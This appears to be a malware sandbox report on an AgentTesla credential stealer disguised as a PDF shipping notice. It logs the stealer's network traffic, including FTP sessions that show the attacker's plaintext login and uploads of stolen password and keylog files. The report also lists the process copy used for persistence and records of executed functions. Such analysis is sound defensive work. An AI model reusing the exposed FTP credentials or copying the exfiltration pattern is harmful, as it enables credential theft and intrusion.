Aug 12, 2024 11:34:13.586929083 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:13.591408968 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:13.591466904 CEST	443	49720	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:14.061522007 CEST	443	49720	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:14.061625004 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:14.063302994 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:14.063338995 CEST	443	49720	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:14.063676119 CEST	443	49720	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:14.112286091 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:14.126858950 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:14.172513962 CEST	443	49720	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:14.236324072 CEST	443	49720	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:14.236449003 CEST	443	49720	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:14.236725092 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:14.240467072 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:15.575123072 CEST	49721	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:15.887578011 CEST	21	49721	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:15.887676954 CEST	49721	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:15.891869068 CEST	49721	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:15.897864103 CEST	21	49721	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:15.897943974 CEST	49721	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:21.333575964 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:21.333642006 CEST	443	49726	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:21.333746910 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:21.337337017 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:21.337354898 CEST	443	49726	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:21.798800945 CEST	443	49726	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:21.798877954 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:21.803544998 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:21.803560019 CEST	443	49726	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:21.803777933 CEST	443	49726	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:21.846652985 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:21.872381926 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:21.912509918 CEST	443	49726	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:21.977443933 CEST	443	49726	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:21.977511883 CEST	443	49726	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:21.977566957 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:21.980098963 CEST	49726	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:22.482757092 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:22.487833977 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:22.488110065 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:23.075859070 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:23.110093117 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:23.115288019 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:23.479160070 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:23.479300976 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:23.484177113 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:23.743561029 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:23.743706942 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:23.750864983 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:23.937284946 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:23.937449932 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:23.942420006 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:24.128449917 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:24.128627062 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:24.133615971 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:24.319792986 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:24.319947004 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:24.324835062 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:24.510642052 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:24.511409998 CEST	49729	63877	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:24.517024040 CEST	63877	49729	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:24.517169952 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:24.517174006 CEST	49729	63877	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:24.523776054 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:25.299884081 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:25.300436974 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:25.300559044 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:25.300721884 CEST	49729	63877	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:25.300776005 CEST	49729	63877	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:25.305583954 CEST	63877	49729	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:25.306307077 CEST	63877	49729	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:25.306376934 CEST	49729	63877	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:25.493480921 CEST	21	49728	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:25.549803972 CEST	49728	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:33.751524925 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:33.758605003 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:35:33.944242954 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:35:33.944785118 CEST	49972	63881	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:33.949831009 CEST	63881	49972	213.189.52.181	192.168.2.6
Aug 12, 2024 11:35:33.949970007 CEST	49972	63881	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:33.950012922 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:33.954895020 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:35:34.498049974 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:35:34.498241901 CEST	49972	63881	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:34.498266935 CEST	49972	63881	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:34.503073931 CEST	63881	49972	213.189.52.181	192.168.2.6
Aug 12, 2024 11:35:34.503675938 CEST	63881	49972	213.189.52.181	192.168.2.6
Aug 12, 2024 11:35:34.504041910 CEST	49972	63881	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:34.549995899 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:35:34.689647913 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:35:34.737499952 CEST	49714	21	192.168.2.6	213.189.52.181

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 12, 2024 11:33:59.861121893 CEST	61943	53	192.168.2.6	1.1.1.1
Aug 12, 2024 11:33:59.870256901 CEST	53	61943	1.1.1.1	192.168.2.6
Aug 12, 2024 11:34:01.252110004 CEST	59225	53	192.168.2.6	1.1.1.1
Aug 12, 2024 11:34:01.351840019 CEST	53	59225	1.1.1.1	192.168.2.6
Aug 12, 2024 11:34:30.635853052 CEST	53	58704	162.159.36.2	192.168.2.6
Aug 12, 2024 11:34:31.115802050 CEST	63037	53	192.168.2.6	1.1.1.1
Aug 12, 2024 11:34:31.124372959 CEST	53	63037	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 12, 2024 11:33:59.861121893 CEST	192.168.2.6	1.1.1.1	0x9f63	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Aug 12, 2024 11:34:01.252110004 CEST	192.168.2.6	1.1.1.1	0x82a2	Standard query (0)	s4.serv00.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 11:34:31.115802050 CEST	192.168.2.6	1.1.1.1	0x3925	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 12, 2024 11:33:59.870256901 CEST	1.1.1.1	192.168.2.6	0x9f63	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Aug 12, 2024 11:33:59.870256901 CEST	1.1.1.1	192.168.2.6	0x9f63	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Aug 12, 2024 11:33:59.870256901 CEST	1.1.1.1	192.168.2.6	0x9f63	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Aug 12, 2024 11:34:01.351840019 CEST	1.1.1.1	192.168.2.6	0x82a2	No error (0)	s4.serv00.com		213.189.52.181	A (IP address)	IN (0x0001)	false
Aug 12, 2024 11:34:31.124372959 CEST	1.1.1.1	192.168.2.6	0x3925	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	172.67.74.152	443	6936	C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-12 09:34:00 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-08-12 09:34:00 UTC	211	IN	HTTP/1.1 200 OK Date: Mon, 12 Aug 2024 09:34:00 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8b1f7795af0541f5-EWR
2024-08-12 09:34:00 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49720	172.67.74.152	443	3804	C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-12 09:34:14 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-08-12 09:34:14 UTC	211	IN	HTTP/1.1 200 OK Date: Mon, 12 Aug 2024 09:34:14 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8b1f77ea9ec80f70-EWR
2024-08-12 09:34:14 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49726	172.67.74.152	443	4972	C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-12 09:34:21 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-08-12 09:34:21 UTC	211	IN	HTTP/1.1 200 OK Date: Mon, 12 Aug 2024 09:34:21 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8b1f781b0ac678dc-EWR
2024-08-12 09:34:21 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Aug 12, 2024 11:34:01.943536043 CEST	21	49714	213.189.52.181	192.168.2.6	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 11:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 11:34. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 11:34. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Aug 12, 2024 11:34:01.943725109 CEST	49714	21	192.168.2.6	213.189.52.181	USER f2241_dol
Aug 12, 2024 11:34:02.136149883 CEST	21	49714	213.189.52.181	192.168.2.6	331 User f2241_dol OK. Password required
Aug 12, 2024 11:34:02.136384010 CEST	49714	21	192.168.2.6	213.189.52.181	PASS Doll900#@
Aug 12, 2024 11:34:02.399908066 CEST	21	49714	213.189.52.181	192.168.2.6	230 OK. Current restricted directory is /
Aug 12, 2024 11:34:02.605839014 CEST	21	49714	213.189.52.181	192.168.2.6	504 Unknown command
Aug 12, 2024 11:34:02.606173992 CEST	49714	21	192.168.2.6	213.189.52.181	PWD
Aug 12, 2024 11:34:02.796732903 CEST	21	49714	213.189.52.181	192.168.2.6	257 "/" is your current location
Aug 12, 2024 11:34:02.828052998 CEST	49714	21	192.168.2.6	213.189.52.181	TYPE I
Aug 12, 2024 11:34:03.019509077 CEST	21	49714	213.189.52.181	192.168.2.6	200 TYPE is now 8-bit binary
Aug 12, 2024 11:34:03.028523922 CEST	49714	21	192.168.2.6	213.189.52.181	PASV
Aug 12, 2024 11:34:03.477665901 CEST	21	49714	213.189.52.181	192.168.2.6	227 Entering Passive Mode (213,189,52,181,249,87)
Aug 12, 2024 11:34:03.479120970 CEST	21	49714	213.189.52.181	192.168.2.6	227 Entering Passive Mode (213,189,52,181,249,87)
Aug 12, 2024 11:34:03.487379074 CEST	49714	21	192.168.2.6	213.189.52.181	STOR PW_user-965543_2024_08_12_05_34_00.html
Aug 12, 2024 11:34:04.038480043 CEST	21	49714	213.189.52.181	192.168.2.6	150 Accepted data connection
Aug 12, 2024 11:34:04.229804039 CEST	21	49714	213.189.52.181	192.168.2.6	226-File successfully transferred 226-File successfully transferred226 0.191 seconds (measured here), 1.78 Kbytes per second
Aug 12, 2024 11:34:23.075859070 CEST	21	49728	213.189.52.181	192.168.2.6	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 11:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 11:34. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 11:34. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Aug 12, 2024 11:34:23.110093117 CEST	49728	21	192.168.2.6	213.189.52.181	USER f2241_dol
Aug 12, 2024 11:34:23.479160070 CEST	21	49728	213.189.52.181	192.168.2.6	331 User f2241_dol OK. Password required
Aug 12, 2024 11:34:23.479300976 CEST	49728	21	192.168.2.6	213.189.52.181	PASS Doll900#@
Aug 12, 2024 11:34:23.743561029 CEST	21	49728	213.189.52.181	192.168.2.6	230 OK. Current restricted directory is /
Aug 12, 2024 11:34:23.937284946 CEST	21	49728	213.189.52.181	192.168.2.6	504 Unknown command
Aug 12, 2024 11:34:23.937449932 CEST	49728	21	192.168.2.6	213.189.52.181	PWD
Aug 12, 2024 11:34:24.128449917 CEST	21	49728	213.189.52.181	192.168.2.6	257 "/" is your current location
Aug 12, 2024 11:34:24.128627062 CEST	49728	21	192.168.2.6	213.189.52.181	TYPE I
Aug 12, 2024 11:34:24.319792986 CEST	21	49728	213.189.52.181	192.168.2.6	200 TYPE is now 8-bit binary
Aug 12, 2024 11:34:24.319947004 CEST	49728	21	192.168.2.6	213.189.52.181	PASV
Aug 12, 2024 11:34:24.510642052 CEST	21	49728	213.189.52.181	192.168.2.6	227 Entering Passive Mode (213,189,52,181,249,133)
Aug 12, 2024 11:34:24.517169952 CEST	49728	21	192.168.2.6	213.189.52.181	STOR PW_user-965543_2024_08_12_05_34_22.html
Aug 12, 2024 11:34:25.299884081 CEST	21	49728	213.189.52.181	192.168.2.6	150 Accepted data connection
Aug 12, 2024 11:34:25.300436974 CEST	21	49728	213.189.52.181	192.168.2.6	150 Accepted data connection
Aug 12, 2024 11:34:25.493480921 CEST	21	49728	213.189.52.181	192.168.2.6	226-File successfully transferred 226-File successfully transferred226 0.423 seconds (measured here), 0.81 Kbytes per second
Aug 12, 2024 11:35:33.751524925 CEST	49714	21	192.168.2.6	213.189.52.181	PASV
Aug 12, 2024 11:35:33.944242954 CEST	21	49714	213.189.52.181	192.168.2.6	227 Entering Passive Mode (213,189,52,181,249,137)
Aug 12, 2024 11:35:33.950012922 CEST	49714	21	192.168.2.6	213.189.52.181	STOR KL_user-965543_2024_08_26_14_44_57.html
Aug 12, 2024 11:35:34.498049974 CEST	21	49714	213.189.52.181	192.168.2.6	150 Accepted data connection
Aug 12, 2024 11:35:34.689647913 CEST	21	49714	213.189.52.181	192.168.2.6	226-File successfully transferred 226-File successfully transferred226 0.191 seconds (measured here), 1.48 Kbytes per second

Target ID:	0
Start time:	05:33:58
Start date:	12/08/2024
Path:	C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe"
Imagebase:	0x380000
File size:	960'000 bytes
MD5 hash:	B9EE0C2BA1D0961EB00AA101730EC076
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:33:58
Start date:	12/08/2024
Path:	C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe"
Imagebase:	0x650000
File size:	960'000 bytes
MD5 hash:	B9EE0C2BA1D0961EB00AA101730EC076
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4609963887.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4609963887.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4609963887.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	05:34:11
Start date:	12/08/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xda0000
File size:	960'000 bytes
MD5 hash:	B9EE0C2BA1D0961EB00AA101730EC076
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs Detection: 56%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:34:12
Start date:	12/08/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xf60000
File size:	960'000 bytes
MD5 hash:	B9EE0C2BA1D0961EB00AA101730EC076
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2364755330.000000000358C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2364755330.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2364755330.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:34:20
Start date:	12/08/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xfe0000
File size:	960'000 bytes
MD5 hash:	B9EE0C2BA1D0961EB00AA101730EC076
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:34:20
Start date:	12/08/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0x9b0000
File size:	960'000 bytes
MD5 hash:	B9EE0C2BA1D0961EB00AA101730EC076
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4611154293.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4611154293.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4611154293.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	0

Executed Functions

Function 025EA508 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025EA75E

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1e17c29bdb521f75abd92176d67bb1320587c2ebc821bc750fc048d8ef127512
Instruction ID: 0c527843d77a9cd84c49ef778a3f35064f50d7efded54c1456f47ab6fbdd01f4
Opcode Fuzzy Hash: 1e17c29bdb521f75abd92176d67bb1320587c2ebc821bc750fc048d8ef127512
Instruction Fuzzy Hash: 4C7113B0A00B058FDB28DF3AD45175ABBF5FF88304F00892ED49A97A50DB75E849CB95

Function 025EAEF0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025ECDA6,?,?,?,?,?), ref: 025ECE67

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ed120e6470af769aeaca8d63285d8e8aa74cb73cdc6e5abd17795b2bd3faba8d
Instruction ID: 836b030381c14e0c0c7a27d9e8053fc0e4b20d27cabf9b99738d3daef876b201
Opcode Fuzzy Hash: ed120e6470af769aeaca8d63285d8e8aa74cb73cdc6e5abd17795b2bd3faba8d
Instruction Fuzzy Hash: 1B2105B5900248EFDB10CFAAD984ADEBBF8FB49310F14841AE914B3310C374A944CFA5

Function 025ECDD8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025ECDA6,?,?,?,?,?), ref: 025ECE67

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 239ac5f81db6d9044ecfc3412d17fd995f7d743b00cf954e46c2a6516b2a62c4
Instruction ID: e28ede92edda23dd8ceb0a185a7f68641856830a47a548056d401cb833559bcb
Opcode Fuzzy Hash: 239ac5f81db6d9044ecfc3412d17fd995f7d743b00cf954e46c2a6516b2a62c4
Instruction Fuzzy Hash: 2C21D2B5900248EFDB10CFAAD584ADEBBF8FB49310F14841AE914A7310C378A945CFA5

Function 025E98C8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025EA7D9,00000800,00000000,00000000), ref: 025EA9EA

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 77bce72df50dc6331beea6c4b95d4a91702e5234fe44c821f9ad1b7f83ccc5cc
Instruction ID: 1b19c9cb00d32997ddbcef15adb13042262ced323377a39313455c7e6ea74193
Opcode Fuzzy Hash: 77bce72df50dc6331beea6c4b95d4a91702e5234fe44c821f9ad1b7f83ccc5cc
Instruction Fuzzy Hash: F51133B28003089FDB14CFAAD844ADEFBF8AB48310F11842AD559B7200C379A544CFA8

Function 025EA978 Relevance: 1.6, APIs: 1, Instructions: 53
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025EA7D9,00000800,00000000,00000000), ref: 025EA9EA

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 84e98a92d1f80b8706b48aa6e19247e76e950bf378ba57ca0afe0f3f3a30a131
Instruction ID: 2013d2af2f9a3c04f348c553bbc717f419670a2f4d7d1df38dd9b816a634af9b
Opcode Fuzzy Hash: 84e98a92d1f80b8706b48aa6e19247e76e950bf378ba57ca0afe0f3f3a30a131
Instruction Fuzzy Hash: 441100B6900349DFDB14CFAAD484ADEFBF8AB88310F11842AD959A7200C379A545CFA5

